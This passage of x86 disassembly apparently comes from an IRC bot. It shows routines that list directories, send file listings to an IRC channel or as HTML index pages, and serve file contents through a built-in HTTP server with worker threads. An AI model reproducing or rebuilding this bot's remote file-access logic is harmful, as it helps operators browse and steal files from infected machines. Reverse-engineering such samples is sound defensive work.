sub_406C24 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406C59 proc near ; CODE XREF: sub_4073C5+143�p
var_798 = byte ptr -798h
var_694 = byte ptr -694h
var_58C = byte ptr -58Ch
var_18C = dword ptr -18Ch
var_178 = byte ptr -178h
var_16C = dword ptr -16Ch
var_160 = byte ptr -160h
var_4C = byte ptr -4Ch
var_24 = byte ptr -24h
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_16 = word ptr -16h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 798h
push ebx
push esi
push edi
xor ebx, ebx
push 104h
lea eax, [ebp+var_798]
push ebx
push eax
mov [ebp+var_4], ebx
mov [ebp+var_8], ebx
call sub_40D7B0
mov edi, [ebp+arg_0]
push offset asc_41A688 ; "\n"
push edi
call sub_40E1DE
add esp, 14h
cmp [ebp+arg_8], ebx
push edi
jz short loc_406CB8
push [ebp+arg_8]
mov esi, 400h
push offset aPrivmsgSSearch ; "PRIVMSG %s :Searching for: %s\r\n"
lea eax, [ebp+var_58C]
push esi
push eax
call sub_40DFEC
add esp, 14h
jmp loc_406DB4
; ---------------------------------------------------------------------------
loc_406CB8: ; CODE XREF: sub_406C59+3B�j
cmp [ebp+arg_C], ebx
jz loc_406D9A
call sub_40D630
push edi
push offset aHtmlHeadTitleI ; "<HTML>\r\n<HEAD>\r\n<TITLE>Index of %s</TIT"...
mov [eax+edi-1], bl
mov esi, 400h
lea eax, [ebp+var_58C]
push esi
push eax
call sub_40DFEC
add esp, 14h
lea eax, [ebp+var_58C]
push ebx
push eax
call sub_40D630
pop ecx
push eax
lea eax, [ebp+var_58C]
push eax
push [ebp+arg_4]
call dword_4C4724
push edi
push offset aH1IndexOfSH1Ta ; "<H1>Index of %s</H1>\r\n<TABLE BORDER=\"0\""...
lea eax, [ebp+var_58C]
push esi
push eax
call sub_40DFEC
add esp, 10h
lea eax, [ebp+var_58C]
push ebx
push eax
call sub_40D630
pop ecx
push eax
lea eax, [ebp+var_58C]
push eax
push [ebp+arg_4]
call dword_4C4724
push edi
call sub_40D630
push 3Ch
push 96h
push 0E6h
push offset aTrTdWidthDCode ; "<TR>\r\n<TD WIDTH=\"%d\"><CODE>Name</CODE><"...
mov byte ptr [eax+edi], 2Ah
lea eax, [ebp+var_58C]
push esi
push eax
call sub_40DFEC
add esp, 1Ch
lea eax, [ebp+var_58C]
push ebx
push eax
call sub_40D630
pop ecx
push eax
lea eax, [ebp+var_58C]
push eax
push [ebp+arg_4]
call dword_4C4724
push offset aTrTdColspan3Hr ; "<TR>\r\n<TD COLSPAN=\"3\"><HR></TD>\r\n</TR>\r"...
lea eax, [ebp+var_58C]
push esi
push eax
call sub_40DFEC
add esp, 0Ch
jmp short loc_406DB4
; ---------------------------------------------------------------------------
loc_406D9A: ; CODE XREF: sub_406C59+62�j
push offset aSearchingForS ; "Searching for: %s\r\n"
mov esi, 400h
lea eax, [ebp+var_58C]
push esi
push eax
call sub_40DFEC
add esp, 10h
loc_406DB4: ; CODE XREF: sub_406C59+5A�j
; sub_406C59+13F�j
lea eax, [ebp+var_58C]
push ebx
push eax
call sub_40D630
pop ecx
push eax
lea eax, [ebp+var_58C]
push eax
push [ebp+arg_4]
call dword_4C4724
cmp [ebp+arg_C], ebx
jz short loc_406E4C
push [ebp+arg_C]
call sub_40D630
cmp eax, 2
pop ecx
jbe short loc_406E4C
push [ebp+arg_C]
call sub_40D630
sub eax, 3
pop ecx
jz short loc_406E00
loc_406DF4: ; CODE XREF: sub_406C59+1A5�j
mov ecx, [ebp+arg_C]
cmp byte ptr [eax+ecx], 2Fh
jz short loc_406E00
dec eax
jnz short loc_406DF4
loc_406E00: ; CODE XREF: sub_406C59+199�j
; sub_406C59+1A2�j
inc eax
push eax
push [ebp+arg_C]
lea eax, [ebp+var_798]
push eax
call sub_40DB80
lea eax, [ebp+var_798]
push eax
push offset aTrTdColspan3AH ; "<TR>\r\n<TD COLSPAN=\"3\"><A HREF=\"%s\"><COD"...
lea eax, [ebp+var_58C]
push esi
push eax
call sub_40DFEC
add esp, 1Ch
lea eax, [ebp+var_58C]
push ebx
push eax
call sub_40D630
pop ecx
push eax
lea eax, [ebp+var_58C]
push eax
push [ebp+arg_4]
call dword_4C4724
loc_406E4C: ; CODE XREF: sub_406C59+17D�j
; sub_406C59+18B�j
lea eax, [ebp+var_18C]
push eax
push edi
call dword_41910C ; FindFirstFileA
lea ecx, [ebp+var_18C]
push ecx
push eax
mov [ebp+var_C], eax
call dword_419108 ; FindNextFileA
test eax, eax
jz loc_407243
mov edi, 3FFh
loc_406E78: ; CODE XREF: sub_406C59+5E4�j
cmp [ebp+var_18C], ebx
jz loc_40722B
lea eax, [ebp+var_160]
push offset a__ ; ".."
push eax
call sub_40D720
test eax, eax
pop ecx
pop ecx
jz loc_40722B
lea eax, [ebp+var_160]
push offset a_ ; "."
push eax
call sub_40D720
test eax, eax
pop ecx
pop ecx
jz loc_40722B
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_178]
push eax
call dword_419104 ; FileTimeToLocalFileTime
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_24]
push eax
call dword_419100 ; FileTimeToSystemTime
mov ax, [ebp+var_14]
cmp ax, 0Ch
mov ecx, offset aPm_0 ; "PM"
ja loc_406F75
mov ecx, offset aAm ; "AM"
movzx eax, ax
loc_406EF4: ; CODE XREF: sub_406C59+322�j
push ecx
movzx ecx, [ebp+var_12]
push ecx
push eax
movzx eax, [ebp+var_1C]
push eax
movzx eax, [ebp+var_16]
push eax
movzx eax, [ebp+var_1A]
push eax
lea eax, [ebp+var_4C]
push offset a2_2d2_2d4d2_2d ; "%2.2d/%2.2d/%4d %2.2d:%2.2d %s"
push eax
call sub_40D6BB
add esp, 20h
test byte ptr [ebp+var_18C], 10h
jz loc_4070AC
inc [ebp+var_8]
cmp [ebp+arg_8], ebx
jz short loc_406F80
lea eax, [ebp+var_160]
push eax
push offset aS_1 ; "<%s>"
lea eax, [ebp+var_694]
push 106h
push eax
call sub_40DFEC
lea eax, [ebp+var_4C]
push eax
lea eax, [ebp+var_694]
push eax
push [ebp+arg_8]
lea eax, [ebp+var_58C]
push offset aPrivmsgS31s21s ; "PRIVMSG %s :%-31s %-21s\n"
push esi
push eax
call sub_40DFEC
add esp, 28h
jmp loc_4071FC
; ---------------------------------------------------------------------------
loc_406F75: ; CODE XREF: sub_406C59+28D�j
movzx eax, ax
sub eax, 0Ch
jmp loc_406EF4
; ---------------------------------------------------------------------------
loc_406F80: ; CODE XREF: sub_406C59+2D5�j
cmp [ebp+arg_C], ebx
jz loc_40706A
push 0E6h
push offset aTrTdWidthDAHre ; "<TR>\r\n<TD WIDTH=\"%d\"><A HREF=\""
lea eax, [ebp+var_58C]
push edi
push eax
call sub_40DFEC
add esp, 10h
lea eax, [ebp+var_58C]
push ebx
push eax
call sub_40D630
pop ecx
push eax
lea eax, [ebp+var_58C]
push eax
push [ebp+arg_4]
call dword_4C4724
lea eax, [ebp+var_160]
push eax
push [ebp+arg_C]
lea eax, [ebp+var_58C]
push offset aSS_2 ; "%s%s/"
push edi
push eax
call sub_40DFEC
add esp, 14h
lea eax, [ebp+var_58C]
push ebx
push eax
call sub_40D630
pop ecx
push eax
lea eax, [ebp+var_58C]
push eax
push [ebp+arg_4]
call dword_4C4724
lea eax, [ebp+var_160]
push eax
call sub_40D630
cmp eax, 1Eh
lea eax, [ebp+var_160]
pop ecx
push eax
lea eax, [ebp+var_58C]
jbe short loc_407026
push offset aCode_29sGtCode ; "\"><CODE>%.29s>/</CODE></A>"
jmp short loc_40702B
; ---------------------------------------------------------------------------
loc_407026: ; CODE XREF: sub_406C59+3C4�j
push offset aCodeSCodeA ; "\"><CODE>%s/</CODE></A>"
loc_40702B: ; CODE XREF: sub_406C59+3CB�j
push edi
push eax
call sub_40DFEC
add esp, 10h
lea eax, [ebp+var_58C]
push ebx
push eax
call sub_40D630
pop ecx
push eax
lea eax, [ebp+var_58C]
push eax
push [ebp+arg_4]
call dword_4C4724
push 3Ch
lea eax, [ebp+var_4C]
push eax
push 96h
push offset aTdTdWidthDCode ; "</TD>\r\n<TD WIDTH=\"%d\"><CODE>%s</CODE></"...
push edi
jmp loc_4071ED
; ---------------------------------------------------------------------------
loc_40706A: ; CODE XREF: sub_406C59+32A�j
lea eax, [ebp+var_160]
push eax
push offset aS_1 ; "<%s>"
lea eax, [ebp+var_694]
loc_40707C: ; DATA XREF: .text:0041F6FC�o
; .text:0041F710�o ...
push 106h
push eax
call sub_40DFEC
lea eax, [ebp+var_4C]
push eax
lea eax, [ebp+var_694]
push eax
push offset a31s21s ; "%-31s %-21s\r\n"
loc_407097: ; CODE XREF: sub_406C59+47B�j
lea eax, [ebp+var_58C]
push esi
push eax
call sub_40DFEC
add esp, 24h
jmp loc_4071FC
; ---------------------------------------------------------------------------
loc_4070AC: ; CODE XREF: sub_406C59+2C9�j
inc [ebp+var_4]
cmp [ebp+arg_8], ebx
jz short loc_4070D6
push ebx
push [ebp+var_16C]
call sub_405B42
push eax
lea eax, [ebp+var_4C]
push eax
lea eax, [ebp+var_160]
push eax
push [ebp+arg_8]
push offset aPrivmsgS31s2_0 ; "PRIVMSG %s :%-31s %-21s (%s bytes)\n"
jmp short loc_407097
; ---------------------------------------------------------------------------
loc_4070D6: ; CODE XREF: sub_406C59+459�j
cmp [ebp+arg_C], ebx
jz loc_4071D6
push 0E6h
push offset aTrTdWidthDAHre ; "<TR>\r\n<TD WIDTH=\"%d\"><A HREF=\""
lea eax, [ebp+var_58C]
push edi
push eax
call sub_40DFEC
add esp, 10h
lea eax, [ebp+var_58C]
push ebx
push eax
call sub_40D630
pop ecx
push eax
lea eax, [ebp+var_58C]
push eax
push [ebp+arg_4]
call dword_4C4724
lea eax, [ebp+var_160]
push eax
push [ebp+arg_C]
lea eax, [ebp+var_58C]
push offset aSS ; "%s%s"
push edi
push eax
call sub_40DFEC
add esp, 14h
lea eax, [ebp+var_58C]
push ebx
push eax
call sub_40D630
pop ecx
push eax
lea eax, [ebp+var_58C]
push eax
push [ebp+arg_4]
call dword_4C4724
lea eax, [ebp+var_160]
push eax
call sub_40D630
cmp eax, 1Fh
lea eax, [ebp+var_160]
pop ecx
push eax
lea eax, [ebp+var_58C]
jbe short loc_40717C
push offset aCode_30sGtCode ; "\"><CODE>%.30s></CODE></A>"
jmp short loc_407181
; ---------------------------------------------------------------------------
loc_40717C: ; CODE XREF: sub_406C59+51A�j
push offset aCodeSCodeA_0 ; "\"><CODE>%s</CODE></A>"
loc_407181: ; CODE XREF: sub_406C59+521�j
push edi
push eax
call sub_40DFEC
add esp, 10h
lea eax, [ebp+var_58C]
push ebx
push eax
call sub_40D630
pop ecx
push eax
lea eax, [ebp+var_58C]
push eax
push [ebp+arg_4]
call dword_4C4724
mov eax, [ebp+var_16C]
shr eax, 0Ah
push eax
push 3Ch
lea eax, [ebp+var_4C]
push eax
push 96h
push offset aTdTdWidthDCo_0 ; "</TD>\r\n<TD WIDTH=\"%d\"><CODE>%s</CODE></"...
lea eax, [ebp+var_58C]
push edi
push eax
call sub_40DFEC
add esp, 1Ch
jmp short loc_4071FC
; ---------------------------------------------------------------------------
loc_4071D6: ; CODE XREF: sub_406C59+480�j
push [ebp+var_16C]
lea eax, [ebp+var_4C]
push eax
lea eax, [ebp+var_160]
push eax
push offset a31s21sIBytes ; "%-31s %-21s (%i bytes)\r\n"
push esi
loc_4071ED: ; CODE XREF: sub_406C59+40C�j
lea eax, [ebp+var_58C]
push eax
call sub_40DFEC
add esp, 18h
loc_4071FC: ; CODE XREF: sub_406C59+317�j
; sub_406C59+44E�j ...
lea eax, [ebp+var_58C]
push ebx
push eax
call sub_40D630
pop ecx
push eax
lea eax, [ebp+var_58C]
push eax
push [ebp+arg_4]
call dword_4C4724
cmp [ebp+arg_8], ebx
jz short loc_40722B
push 7D0h
call dword_419060 ; Sleep
loc_40722B: ; CODE XREF: sub_406C59+225�j
; sub_406C59+240�j ...
lea eax, [ebp+var_18C]
push eax
push [ebp+var_C]
call dword_419108 ; FindNextFileA
test eax, eax
jnz loc_406E78
loc_407243: ; CODE XREF: sub_406C59+214�j
push [ebp+var_C]
call dword_4190FC ; FindClose
cmp [ebp+arg_8], ebx
jz short loc_407286
mov eax, [ebp+var_8]
cdq
push edx
push eax
call sub_405B42
pop ecx
pop ecx
push eax
mov eax, [ebp+var_4]
cdq
push edx
push eax
call sub_405B42
pop ecx
pop ecx
push eax
push [ebp+arg_8]
lea eax, [ebp+var_58C]
push offset aPrivmsgSFoun_0 ; "PRIVMSG %s :Found %s Files and %s Direc"...
push eax
call sub_40D6BB
add esp, 14h
jmp short loc_4072B4
; ---------------------------------------------------------------------------
loc_407286: ; CODE XREF: sub_406C59+5F6�j
cmp [ebp+arg_C], ebx
lea eax, [ebp+var_58C]
jz short loc_4072A0
push offset aTrTdColspan3_0 ; "<TR>\r\n<TD COLSPAN=\"3\"><HR></TD>\r\n</TR>\r"...
push eax
call sub_40D6BB
pop ecx
pop ecx
jmp short loc_4072B4
; ---------------------------------------------------------------------------
loc_4072A0: ; CODE XREF: sub_406C59+636�j
push [ebp+var_8]
push [ebp+var_4]
push offset aFoundIFilesAnd ; "Found: %i Files and %i Directories\r\n"
push eax
call sub_40D6BB
add esp, 10h
loc_4072B4: ; CODE XREF: sub_406C59+62B�j
; sub_406C59+645�j
lea eax, [ebp+var_58C]
push ebx
push eax
call sub_40D630
pop ecx
push eax
lea eax, [ebp+var_58C]
push eax
push [ebp+arg_4]
call dword_4C4724
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn
sub_406C59 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4072DA proc near ; CODE XREF: sub_4073C5+125�p
var_408 = byte ptr -408h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 408h
push ebx
push esi
push edi
xor esi, esi
push esi
push esi
push 3
push esi
push 1
push 80000000h
push [ebp+arg_4]
mov edi, 400h
mov [ebp+var_8], esi
call dword_4190E0 ; CreateFileA
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_407392
push esi
push ebx
call dword_419118 ; GetFileSize
cmp eax, esi
mov [ebp+var_4], eax
jz short loc_40738B
loc_40731F: ; CODE XREF: sub_4072DA+AF�j
push 400h
lea eax, [ebp+var_408]
push esi
push eax
call sub_40D7B0
add esp, 0Ch
cmp edi, [ebp+var_4]
jbe short loc_40733C
mov edi, [ebp+var_4]
loc_40733C: ; CODE XREF: sub_4072DA+5D�j
mov eax, [ebp+var_4]
push 2
push esi
neg eax
push eax
push ebx
call dword_419114 ; SetFilePointer
push esi
lea eax, [ebp+var_8]
push eax
push edi
lea eax, [ebp+var_408]
push eax
push ebx
call dword_419110 ; ReadFile
push esi
push edi
lea eax, [ebp+var_408]
push eax
push [ebp+arg_0]
call dword_4C4724
cmp eax, 0FFFFFFFFh
jnz short loc_407386
call dword_4C4748
cmp eax, 2733h
jnz short loc_40738B
xor eax, eax
loc_407386: ; CODE XREF: sub_4072DA+9B�j
sub [ebp+var_4], eax
jnz short loc_40731F
loc_40738B: ; CODE XREF: sub_4072DA+43�j
; sub_4072DA+A8�j
push ebx
call dword_419064 ; CloseHandle
loc_407392: ; CODE XREF: sub_4072DA+30�j
pop edi
pop esi
pop ebx
leave
retn
sub_4072DA endp
; =============== S U B R O U T I N E =======================================
sub_407397 proc near ; CODE XREF: sub_40752D+17B�p
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
push edi
xor esi, esi
call sub_40D630
test eax, eax
pop ecx
jbe short loc_4073C0
loc_4073AA: ; CODE XREF: sub_407397+27�j
cmp byte ptr [esi+edi], 5Ch
jnz short loc_4073B4
mov byte ptr [esi+edi], 2Fh
loc_4073B4: ; CODE XREF: sub_407397+17�j
push edi
inc esi
call sub_40D630
cmp esi, eax
pop ecx
jb short loc_4073AA
loc_4073C0: ; CODE XREF: sub_407397+11�j
mov eax, edi
pop edi
pop esi
retn
sub_407397 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_4073C5 proc near ; DATA XREF: sub_40752D+245�o
var_1654 = byte ptr -1654h
var_654 = byte ptr -654h
var_550 = byte ptr -550h
var_44C = dword ptr -44Ch
var_3C8 = byte ptr -3C8h
var_2C4 = byte ptr -2C4h
var_B8 = dword ptr -0B8h
var_B4 = dword ptr -0B4h
var_A4 = dword ptr -0A4h
var_9C = byte ptr -9Ch
var_68 = byte ptr -68h
var_20 = byte ptr -20h
arg_0 = dword ptr 8
push ebp
mov eax, 1654h
lea ebp, [esp-74h]
call sub_40D9A0
mov eax, [ebp+74h+arg_0]
push esi
push edi
mov esi, eax
mov ecx, 0ECh
lea edi, [ebp+74h+var_44C]
rep movsd
mov dword ptr [eax+3ACh], 1
lea eax, [ebp+74h+var_3C8]
push eax
lea eax, [ebp+74h+var_550]
push eax
call sub_40D6BB
lea eax, [ebp+74h+var_2C4]
push eax
lea eax, [ebp+74h+var_654]
push eax
call sub_40D6BB
xor edi, edi
add esp, 10h
cmp [ebp+74h+var_A4], edi
lea eax, [ebp+74h+var_9C]
jz short loc_40742C
push offset aTextHtml ; "text/html"
jmp short loc_407431
; ---------------------------------------------------------------------------
loc_40742C: ; CODE XREF: sub_4073C5+5E�j
push offset aApplicationOct ; "application/octet-stream"
loc_407431: ; CODE XREF: sub_4073C5+65�j
push eax
call sub_40D6BB
pop ecx
pop ecx
push 46h
lea eax, [ebp+74h+var_68]
push eax
push offset aDddDdMmmYyyy ; "ddd, dd MMM yyyy"
push edi
push edi
mov esi, 409h
push esi
call dword_419120 ; GetDateFormatA
push 1Eh
lea eax, [ebp+74h+var_20]
push eax
push offset aHhMmSs ; "HH:mm:ss"
push edi
push edi
push esi
call dword_41911C ; GetTimeFormatA
cmp [ebp+74h+var_B8], 0FFFFFFFFh
lea eax, [ebp+74h+var_20]
push eax
lea eax, [ebp+74h+var_68]
push eax
lea eax, [ebp+74h+var_20]
push eax
lea eax, [ebp+74h+var_68]
push eax
lea eax, [ebp+74h+var_20]
push eax
lea eax, [ebp+74h+var_68]
push eax
lea eax, [ebp+74h+var_9C]
jnz short loc_40749E
push eax
lea eax, [ebp+74h+var_1654]
push offset aHttp1_0200OkSe ; "HTTP/1.0 200 OK\r\nServer: myShit\r\nCache-"...
push eax
call sub_40D6BB
add esp, 24h
jmp short loc_4074B6
; ---------------------------------------------------------------------------
loc_40749E: ; CODE XREF: sub_4073C5+C0�j
push [ebp+74h+var_B8]
push eax
lea eax, [ebp+74h+var_1654]
push offset aHttp1_0200Ok_0 ; "HTTP/1.0 200 OK\r\nServer: myShit\r\nCache-"...
push eax
call sub_40D6BB
add esp, 28h
loc_4074B6: ; CODE XREF: sub_4073C5+D7�j
lea eax, [ebp+74h+var_1654]
push edi
push eax
call sub_40D630
pop ecx
push eax
lea eax, [ebp+74h+var_1654]
push eax
push [ebp+74h+var_44C]
call dword_4C4724
cmp [ebp+74h+var_A4], edi
jnz short loc_4074F3
lea eax, [ebp+74h+var_550]
push eax
push [ebp+74h+var_44C]
call sub_4072DA
pop ecx
pop ecx
jmp short loc_407510
; ---------------------------------------------------------------------------
loc_4074F3: ; CODE XREF: sub_4073C5+116�j
lea eax, [ebp+74h+var_654]
push eax
push edi
push [ebp+74h+var_44C]
lea eax, [ebp+74h+var_550]
push eax
call sub_406C59
add esp, 10h
loc_407510: ; CODE XREF: sub_4073C5+12C�j
push [ebp+74h+var_44C]
call dword_4C479C
push [ebp+74h+var_B4]
call sub_40AADD
pop ecx
push edi
call dword_4190D8 ; ExitThread
int 3 ; Trap to Debugger
sub_4073C5 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40752D proc near ; CODE XREF: sub_4077DC+399�p
var_AC4 = byte ptr -0AC4h
var_6C4 = dword ptr -6C4h
var_640 = byte ptr -640h
var_53C = byte ptr -53Ch
var_330 = dword ptr -330h
var_32C = dword ptr -32Ch
var_31C = dword ptr -31Ch
var_318 = dword ptr -318h
var_314 = byte ptr -314h
var_211 = byte ptr -211h
var_210 = byte ptr -210h
var_10C = byte ptr -10Ch
var_10B = byte ptr -10Bh
var_10A = byte ptr -10Ah
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 0AC4h
push ebx
push esi
push edi
xor ebx, ebx
push 104h
lea eax, [ebp+var_210]
push ebx
push eax
mov [ebp+var_4], ebx
call sub_40D7B0
mov eax, [ebp+arg_8]
add esp, 0Ch
cmp byte ptr [eax], 2Fh
push eax
jz short loc_407563
push offset aS_6 ; "\\%s"
jmp short loc_40756B
; ---------------------------------------------------------------------------
loc_407563: ; CODE XREF: sub_40752D+2D�j
mov byte ptr [eax], 5Ch
push offset aS_0 ; "%s"
loc_40756B: ; CODE XREF: sub_40752D+34�j
lea eax, [ebp+var_10C]
push eax
call sub_40D6BB
lea eax, [ebp+var_10C]
add esp, 0Ch
push eax
xor esi, esi
xor edi, edi
call sub_40D630
test eax, eax
pop ecx
jbe short loc_407606
mov [ebp+arg_8], 2
loc_407596: ; CODE XREF: sub_40752D+D7�j
lea eax, [ebp+var_10C]
push eax
call sub_40D630
cmp [ebp+arg_8], eax
pop ecx
jnb short loc_4075D6
cmp [ebp+esi+var_10C], 25h
jnz short loc_4075D6
cmp [ebp+esi+var_10B], 32h
jnz short loc_4075D6
cmp [ebp+esi+var_10A], 30h
jnz short loc_4075D6
inc esi
inc esi
add [ebp+arg_8], 2
mov [ebp+edi+var_210], 20h
jmp short loc_4075F0
; ---------------------------------------------------------------------------
loc_4075D6: ; CODE XREF: sub_40752D+79�j
; sub_40752D+83�j ...
mov al, [ebp+esi+var_10C]
cmp al, 2Fh
jnz short loc_4075E6
push 5Ch
pop eax
jmp short loc_4075E9
; ---------------------------------------------------------------------------
loc_4075E6: ; CODE XREF: sub_40752D+B2�j
movsx eax, al
loc_4075E9: ; CODE XREF: sub_40752D+B7�j
mov [ebp+edi+var_210], al
loc_4075F0: ; CODE XREF: sub_40752D+A7�j
lea eax, [ebp+var_10C]
inc esi
inc [ebp+arg_8]
push eax
inc edi
call sub_40D630
cmp esi, eax
pop ecx
jb short loc_407596
loc_407606: ; CODE XREF: sub_40752D+60�j
lea eax, [ebp+var_210]
push eax
push [ebp+arg_4]
lea eax, [ebp+var_314]
push offset aSS ; "%s%s"
push eax
call sub_40D6BB
lea eax, [ebp+var_314]
push offset asc_41A688 ; "\n"
push eax
call sub_40E1DE
add esp, 18h
lea eax, [ebp+var_314]
push eax
call dword_4190C4 ; GetFileAttributesA
xor esi, esi
inc esi
cmp eax, 10h
jz short loc_407654
cmp eax, 0FFFFFFFFh
jnz short loc_407657
push [ebp+arg_0]
jmp short loc_4076D3
; ---------------------------------------------------------------------------
loc_407654: ; CODE XREF: sub_40752D+11B�j
mov [ebp+var_4], esi
loc_407657: ; CODE XREF: sub_40752D+120�j
cmp [ebp+edi+var_211], 5Ch
jnz short loc_407664
mov [ebp+var_4], esi
loc_407664: ; CODE XREF: sub_40752D+132�j
cmp [ebp+var_4], ebx
mov edi, [ebp+arg_0]
mov [ebp+var_6C4], edi
mov [ebp+var_318], ebx
jz short loc_4076DE
cmp [ebp+arg_C], ebx
jz short loc_4076D2
lea eax, [ebp+var_314]
push offset asc_41A8F4 ; "*"
push eax
call sub_40D8B0
lea eax, [ebp+var_314]
push eax
lea eax, [ebp+var_640]
push eax
call sub_40D6BB
lea eax, [ebp+var_210]
push eax
call sub_407397
lea eax, [ebp+var_210]
push eax
lea eax, [ebp+var_53C]
push eax
call sub_40D6BB
add esp, 1Ch
or [ebp+var_330], 0FFFFFFFFh
mov [ebp+var_31C], esi
jmp short loc_40772D
; ---------------------------------------------------------------------------
loc_4076D2: ; CODE XREF: sub_40752D+14E�j
push edi
loc_4076D3: ; CODE XREF: sub_40752D+125�j
call dword_4C479C
jmp loc_4077C3
; ---------------------------------------------------------------------------
loc_4076DE: ; CODE XREF: sub_40752D+149�j
push ebx
push ebx
push 3
push ebx
push esi
push 80000000h
lea eax, [ebp+var_314]
push eax
call dword_4190E0 ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_40772D
lea eax, [ebp+var_314]
push eax
lea eax, [ebp+var_640]
push eax
call sub_40D6BB
pop ecx
pop ecx
push ebx
push esi
mov [ebp+var_31C], ebx
call dword_419118 ; GetFileSize
push esi
mov [ebp+var_330], eax
call dword_419064 ; CloseHandle
loc_40772D: ; CODE XREF: sub_40752D+1A3�j
; sub_40752D+1CE�j
mov esi, [ebp+arg_10]
push esi
lea eax, [ebp+var_AC4]
push offset aWorkerThreadOf ; "Worker thread of s3rv3r thread: %d."
push eax
call sub_40D6BB
push ebx
lea eax, [ebp+var_AC4]
push 2
push eax
call sub_40A83B
mov [ebp+var_32C], eax
imul eax, 434h
add esp, 18h
mov dword_42220C[eax], esi
lea eax, [ebp+var_8]
push eax
push ebx
lea eax, [ebp+var_6C4]
push eax
push offset sub_4073C5
push ebx
push ebx
call dword_4190B0 ; CreateThread
mov ecx, [ebp+var_32C]
imul ecx, 434h
cmp eax, ebx
mov dword_42221C[ecx], eax
jnz short loc_4077D2
push edi
call dword_4C479C
call dword_4190AC ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_AC4]
push offset aFailedToStartW ; "Failed to start work3r thread, error: <"...
push eax
call sub_40D6BB
lea eax, [ebp+var_AC4]
push eax
call sub_401648
add esp, 10h
loc_4077C3: ; CODE XREF: sub_40752D+1AC�j
; sub_40752D+2AD�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_4077CA: ; CODE XREF: sub_40752D+2AB�j
push 5
call dword_419060 ; Sleep
loc_4077D2: ; CODE XREF: sub_40752D+266�j
cmp [ebp+var_318], ebx
jz short loc_4077CA
jmp short loc_4077C3
sub_40752D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4077DC proc near ; DATA XREF: sub_40198E+1117�o
var_2AF0 = byte ptr -2AF0h
var_1AF0 = byte ptr -1AF0h
var_AF0 = byte ptr -0AF0h
var_6F0 = dword ptr -6F0h
var_6EC = byte ptr -6ECh
var_464 = byte ptr -464h
var_360 = dword ptr -360h
var_358 = dword ptr -358h
var_354 = dword ptr -354h
var_350 = dword ptr -350h
var_34C = dword ptr -34Ch
var_340 = byte ptr -340h
var_23C = byte ptr -23Ch
var_138 = byte ptr -138h
var_128 = dword ptr -128h
var_124 = dword ptr -124h
var_120 = dword ptr -120h
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 2AF0h
call sub_40D9A0
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov esi, eax
mov ecx, 0ECh
lea edi, [ebp+var_6F0]
rep movsd
xor esi, esi
inc esi
push 10h
mov [eax+3ACh], esi
xor ebx, ebx
lea eax, [ebp+var_24]
push ebx
push eax
mov [ebp+var_10], esi
call sub_40D7B0
add esp, 0Ch
push [ebp+var_360]
mov [ebp+var_24], 2
call dword_4C47DC
push ebx
push esi
push 2
mov [ebp+var_22], ax
mov [ebp+var_20], ebx
call dword_4C4690
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_8], edi
jz loc_407BB0
mov eax, [ebp+var_358]
imul eax, 434h
mov dword_422214[eax], edi
push 10h
lea eax, [ebp+var_24]
push eax
push edi
call dword_4C4768
cmp eax, 0FFFFFFFFh
jz loc_407BB0
push 7FFFFFFFh
push edi
call dword_4C47B4
cmp eax, 0FFFFFFFFh
jz loc_407BB0
lea eax, [ebp+var_10]
push eax
push 8004667Eh
push edi
call dword_4C4624
cmp eax, 0FFFFFFFFh
jz loc_407BB0
push 41h
pop ecx
push ebx
push ebx
lea eax, [ebp+var_23C]
push ebx
push eax
mov [ebp+var_124], edi
mov [ebp+var_128], esi
mov [ebp+var_C], edi
mov eax, edi
loc_4078C0: ; CODE XREF: sub_4077DC+3CC�j
inc eax
lea esi, [ebp+var_128]
lea edi, [ebp+var_23C]
push eax
rep movsd
call dword_4C4734
cmp eax, 0FFFFFFFFh
jz loc_407BAD
xor esi, esi
mov [ebp+arg_0], esi
loc_4078E4: ; CODE XREF: sub_4077DC+3B6�j
lea eax, [ebp+var_23C]
push eax
push esi
call dword_4C46E4
test eax, eax
jz loc_407B88
cmp esi, [ebp+var_8]
jnz short loc_407964
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_138]
push eax
push [ebp+var_8]
mov [ebp+var_14], 10h
call dword_4C464C
cmp eax, 0FFFFFFFFh
jz loc_407B88
mov edx, [ebp+var_128]
xor ecx, ecx
cmp edx, ebx
jbe short loc_40793D
loc_40792F: ; CODE XREF: sub_4077DC+15F�j
cmp [ebp+ecx*4+var_124], eax
jz short loc_40793D
inc ecx
cmp ecx, edx
jb short loc_40792F
loc_40793D: ; CODE XREF: sub_4077DC+151�j
; sub_4077DC+15A�j
cmp ecx, edx
jnz short loc_407953
cmp edx, 40h
